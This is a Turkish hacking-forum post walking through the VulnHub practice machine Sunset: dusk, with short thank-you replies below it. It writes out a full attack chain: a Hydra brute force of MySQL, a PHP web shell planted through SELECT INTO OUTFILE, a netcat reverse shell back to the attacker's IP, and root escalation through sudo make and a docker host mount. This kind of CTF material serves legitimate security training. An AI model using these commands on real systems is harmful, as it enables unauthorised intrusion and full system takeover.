THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS

P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
6
1759
24-12-2019 11:42
#1
Merhabalar TürkHackTeam ailesi, bugün sizlere Sunset:dusk VulnHub Zafiyetli Makinesinin Çözümünü göstereceğim.




https://www.vulnhub.com/entry/sunset-dusk,404/




Makine İsmi: Sunset: dusk

Yayınlanma Tarihi: 1 Aralık 2019

Yapımcı: whitecr0wz

Seri: sunset

Açıklama: Hedefde ki user.txt ve root.txt dosyalarında ki flag'ı almak

Dosya Boyutu: 1.1 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Kolay




İlk olarak makinenin IP adresini öğrenmek için
Kod:
sudo netdiscover
yazalım.



Makinenin IP adresini öğrendik.



Şimdi açık portları öğrenmek ve yolumuzu çizmek için NMAP taraması yapacağız. Terminale
Kod:
nmap -A IP_adresi
yazalım.

Burada önemli nokta mysql'in açık olması





80 portu açıktı ve bir site olduğunu anladık, siteye girdiğimiz de sitede pekte bir şey bulamadık.



Ardından Hydra aracı ile MySQL'e Brute saldırı yapacağız. Bunun için
Kod:
hydra -L kullanıcı_adı_listesi -P şifre_listesi IP_adresi mysql
yazalım. Gördüğünüz gibi bilgiyi aldık kullanıcı adı: root şifre: password



Ardından sitenin 8080 portuna gittim ve /var/tmp olduğumuzu söylüyor bize. MySQL'i kullanarak buraya veri atacağız birazdan.



MySQL'e giriş yapmak için
Kod:
mysql -h IP_adresi -u root -p
yazalım ve şifreyi girelim. Ardından https://github.com/pentestmonkey/php...erse-shell.php buraya giderek kodları kopyalayıp bir php dosyası oluşturalım. Bu kodlarda biraz aşağıda CHANGE THİS kısımları var.
Kod:
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
burada $ip = kendi makineninizin IP adresinizi yazınız.
Ardından MySQL'e
Kod:
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/p4rs.php' ;
p4rs.php dosyasını ben kendim oluşturdum siz başka isimde de oluşturabilirsiniz.



Tarayıcıya IP_adresi:8080 yazdığımızda kendi oluşturduğumuz dosyamız içeride gördüğünüz gibi.



Tarayıcıya gelerek
Kod:
http://IP_adresi:8080/p4rs.php?cmd=id
yazdığımızda RCE komutu gördüğünüz gibi sistemde çalıştı.



Şimdi terminali açalım ve portu dinlemeye alalım
Kod:
nc -lvp 1234
. Ardından tarayıcıya da
Kod:
http://IP_adresi:8080/p4rs.php?cmd=nc -e /bin/bash Kendi_IP_adresiniz 1234
yazalım ve içeri girelim.



Bağlantı kuruldu ve içeri girdik, kabuk yükseltmesi için
Kod:
python -c "import pty;pty.spawn('/bin/bash')"
yazalım. Ardından home dizinine girip dusk dizinine girelim. Gördüğünüz gibi orada user.txt dosyasını bulduk yazdıralım ve ilk bayrağı alalım.



Sudo haklarını öğrenmek için sudo -l yazdık. Şimdi exploit ederek içeri girmek için
Kod:
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
yazdık. groups yazdığımızda docker grubunda olduğunu öğrendik.



Docker'ı kullanarak yapacağız ancak fotoğrafta gözükmemiş orada. -v parametresi istediğimiz bir şeyi oluşturmak için -i ve -t kabuk moduna girmek için kullanılır.

Kod:
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
yazdık ve birkaç veri oluşturdu, içeri girdik.
id dediğimiz de root yetkisinde olduğumuzu gördük. Direk
Kod:
cd /root
yazdık ve root dizinine girdik.
Kod:
ls
yazdığımızda root.txt dosyası olduğunu gördük ve yazdırdık.





Gördüğünüz gibi iki bayrağı da aldık





Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...

---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
24-12-2019 16:55
#2
Ellerine sağlık yeni düzeni sevdim, devamını bekliyorum
x4807 - ait Kullanıcı Resmi (Avatar)
Analizci
Üyelik tarihi:
08/2019
Nereden:
\x20
Mesajlar:
955
Konular:
111
Ticaret:
(0) %
24-12-2019 17:04
#3
Ellerinize sağlık hocam böyle zaafiyetli makine çözüm konuları hoş oluyor
NOVA - ait Kullanıcı Resmi (Avatar)
Kıdemli Grafiker
Üyelik tarihi:
06/2016
Nereden:
UI
Yaş:
31
Mesajlar:
2.478
Konular:
397
Teşekkür (Etti):
1431
Teşekkür (Aldı):
2212
Ticaret:
(0) %
24-12-2019 19:01
#4
Elinize Sağlık. Güzel konu.
---------------------
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
24-12-2019 22:15
#5
Alıntı:
Xowly´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık yeni düzeni sevdim, devamını bekliyorum
Alıntı:
Noah Parker´isimli üyeden Alıntı Mesajı göster
Ellerinize sağlık hocam böyle zaafiyetli makine çözüm konuları hoş oluyor
Alıntı:
dcrean´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık. Güzel konu.
Beğenmenize sevindim arkadaşlar
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
ZoRRoKiN - ait Kullanıcı Resmi (Avatar)
Administrator
Üyelik tarihi:
08/2005
Nereden:
WORLD
Mesajlar:
2.114
Konular:
796
Teşekkür (Etti):
455
Teşekkür (Aldı):
6733
Ticaret:
(1) %
25-12-2019 10:14
#6
Güzel paylaşım.
--------------------- Ne fark eder ki...
P4RS Teşekkür etti.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
25-12-2019 19:20
#7
Alıntı:
ZoRRoKiN´isimli üyeden Alıntı Mesajı göster
Güzel paylaşım.
Beğenmenize çok sevindim hocam
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler